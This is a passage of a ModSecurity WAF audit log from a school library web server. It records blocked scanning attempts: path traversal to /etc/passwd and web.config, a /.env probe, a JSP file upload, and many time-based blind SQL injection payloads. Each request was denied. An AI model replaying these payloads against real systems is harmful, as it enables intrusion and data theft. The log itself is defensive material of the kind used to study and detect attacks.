zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 165481560 --d63eba0d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d63eba0d-E-- --d63eba0d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /attachment?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747871183144397 1867 (- - -) Stopwatch2: 1747871183144397 1867; combined=594, p1=438, p2=122, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d63eba0d-Z-- --4a8f7026-A-- [22/May/2025:06:51:57 +0700] aC5nHeThJmFSRJ5-OZdYOgAAAEU 103.236.140.4 60290 103.236.140.4 8181 --4a8f7026-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=zewmnfgq.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165481852 --4a8f7026-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("ybeckexomb");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundary92pUawKc-- --4a8f7026-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a8f7026-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747871517967373 6571 (- - -) Stopwatch2: 1747871517967373 6571; combined=4966, p1=559, p2=4381, p3=0, p4=0, p5=26, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a8f7026-Z-- --d728650d-A-- [22/May/2025:07:01:26 +0700] aC5pVmfriXjg62qQwE_lBgAAAIU 103.236.140.4 60932 103.236.140.4 8181 --d728650d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G965F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --d728650d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d728650d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747872086912652 815 (- - -) Stopwatch2: 1747872086912652 815; combined=378, p1=345, p2=0, p3=0, p4=0, p5=32, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d728650d-Z-- --a4f08f48-A-- [22/May/2025:07:20:43 +0700] aC5t230O04WKE1HJ5iT-wwAAAAo 103.236.140.4 34034 103.236.140.4 8181 --a4f08f48-B-- GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),4)-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14 Accept-Charset: utf-8 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 159417168 --a4f08f48-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a4f08f48-E-- --a4f08f48-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and 4563=dbms_pipe.receive_message(chr(65),4)-- found within REQUEST_URI: /portal/pt/erfile/down/bill?pageid=login&id=1' and 4563=dbms_pipe.receive_message(chr(65),4)--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243396761 2816 (- - -) Stopwatch2: 1747873243396761 2816; combined=1350, p1=495, p2=836, p3=0, p4=0, p5=19, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4f08f48-Z-- --c62c807f-A-- [22/May/2025:07:20:43 +0700] aC5t2-ThJmFSRJ5-OZdYywAAAEY 103.236.140.4 34046 103.236.140.4 8181 --c62c807f-B-- GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 160793104 --c62c807f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c62c807f-E-- --c62c807f-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243397217 2481 (- - -) Stopwatch2: 1747873243397217 2481; combined=1199, p1=404, p2=763, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c62c807f-Z-- --90210d71-A-- [22/May/2025:07:20:43 +0700] aC5t22friXjg62qQwE_ldQAAAI4 103.236.140.4 34062 103.236.140.4 8181 --90210d71-B-- GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163513655 --90210d71-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --90210d71-E-- --90210d71-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243398200 2590 (- - -) Stopwatch2: 1747873243398200 2590; combined=1442, p1=337, p2=1081, p3=0, p4=0, p5=23, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90210d71-Z-- --3b715505-A-- [22/May/2025:07:20:43 +0700] aC5t2-ThJmFSRJ5-OZdYzAAAAEo 103.236.140.4 34048 103.236.140.4 8181 --3b715505-B-- POST /services/userInfoWeb HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 561 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/128.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Cache-Control: max-age=0 Content-Type: text/xml;charset=UTF-8 DNT: 1 Origin: null SOAPAction: Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168567548 --3b715505-C-- ';waitfor delay '0:0:3'-- --3b715505-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b715505-E-- --3b715505-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /services/userInfoWeb"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243397538 3491 (- - -) Stopwatch2: 1747873243397538 3491; combined=1995, p1=349, p2=1625, p3=0, p4=0, p5=20, sr=68, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b715505-Z-- --f062b81b-A-- [22/May/2025:07:20:43 +0700] aC5t2yektx75wRFPQyh--gAAAMM 103.236.140.4 34050 103.236.140.4 8181 --f062b81b-B-- GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168436652 --f062b81b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f062b81b-E-- --f062b81b-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243397531 3729 (- - -) Stopwatch2: 1747873243397531 3729; combined=1957, p1=550, p2=1377, p3=0, p4=0, p5=29, sr=145, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f062b81b-Z-- --e744cc17-A-- [22/May/2025:07:20:43 +0700] aC5t2yektx75wRFPQyh--wAAAMc 103.236.140.4 34058 103.236.140.4 8181 --e744cc17-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:3'--+&unitID=public HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept: */* SOAPAction: http://tempuri.org/GetHomeInfo Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163086402 --e744cc17-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e744cc17-E-- --e744cc17-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:3'--+&unitID=public"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243398182 3333 (- - -) Stopwatch2: 1747873243398182 3333; combined=1740, p1=334, p2=1382, p3=0, p4=0, p5=24, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e744cc17-Z-- --b405997f-A-- [22/May/2025:07:20:43 +0700] aC5t230O04WKE1HJ5iT-xQAAAAw 103.236.140.4 34034 103.236.140.4 8181 --b405997f-B-- GET /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:137.0) Gecko/20100101 Firefox/137.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163020821 --b405997f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b405997f-E-- --b405997f-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243400362 2416 (- - -) Stopwatch2: 1747873243400362 2416; combined=1382, p1=356, p2=989, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b405997f-Z-- --a1a0107e-A-- [22/May/2025:07:20:43 +0700] aC5t2yektx75wRFPQyh-_QAAAMs 103.236.140.4 34038 103.236.140.4 8181 --a1a0107e-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+ HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/json Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 162988062 --a1a0107e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a1a0107e-E-- --a1a0107e-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243401336 2554 (- - -) Stopwatch2: 1747873243401336 2554; combined=1616, p1=315, p2=1273, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1a0107e-Z-- --4e77ec67-A-- [22/May/2025:07:20:43 +0700] aC5t2-ThJmFSRJ5-OZdYzQAAAEg 103.236.140.4 34046 103.236.140.4 8181 --4e77ec67-B-- POST /u9/OnLine/UMWebService.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 371 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetLogContent" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 165937164 --4e77ec67-C-- ../web.config --4e77ec67-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e77ec67-H-- Message: Access denied with code 403 (phase 2). Matched phrase "Web.config" at XML. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: Web.config found within XML: web.config\x0a \x0a \x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243401050 3254 (- - -) Stopwatch2: 1747873243401050 3254; combined=2136, p1=387, p2=1724, p3=0, p4=0, p5=25, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e77ec67-Z-- --319a653c-A-- [22/May/2025:07:20:44 +0700] aC5t3GfriXjg62qQwE_ldwAAAJA 103.236.140.4 34062 103.236.140.4 8181 --319a653c-B-- POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 104 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 159417174 --319a653c-C-- {"reportType":"1';waitfor delay '0:0:3'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]} --319a653c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --319a653c-E-- --319a653c-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244040635 3307 (- - -) Stopwatch2: 1747873244040635 3307; combined=1830, p1=467, p2=1332, p3=0, p4=0, p5=30, sr=81, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --319a653c-Z-- --83b90459-A-- [22/May/2025:07:20:44 +0700] aC5t3Cektx75wRFPQyh-_wAAAMg 103.236.140.4 34038 103.236.140.4 8181 --83b90459-B-- GET /u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm&kjnd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=34DCA648490CB73AC7CD8ED3738BC883 X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 159417177 --83b90459-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --83b90459-E-- --83b90459-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm&kjnd"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 